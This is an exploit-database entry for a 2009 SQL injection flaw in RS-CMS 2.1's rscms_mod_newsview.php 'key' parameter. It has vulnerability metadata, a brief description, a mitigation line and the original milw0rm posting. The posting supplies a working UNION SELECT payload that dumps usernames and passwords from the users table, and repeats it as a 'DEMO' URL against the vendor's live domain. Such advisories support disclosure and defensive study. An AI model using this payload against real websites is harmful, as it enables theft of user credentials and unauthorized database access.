RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability

vendor:

RS-CMS

by:

Mr.tro0oqy

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: RS-CMS

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:rs-cms:rs-cms:2.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability

A vulnerability exists in RS-CMS 2.1, which allows a remote attacker to inject arbitrary SQL commands via the 'key' parameter in 'rscms_mod_newsview.php' script. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of RS-CMS 2.1 or apply the appropriate patch.

Source

Exploit-DB raw data:

=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability

[+] Found by : Mr.tro0oqy 
   
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
BUGS
====

Sql Injections:
rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--

DEMO
====
http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--


=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
all my Friends

# milw0rm.com [2009-06-22]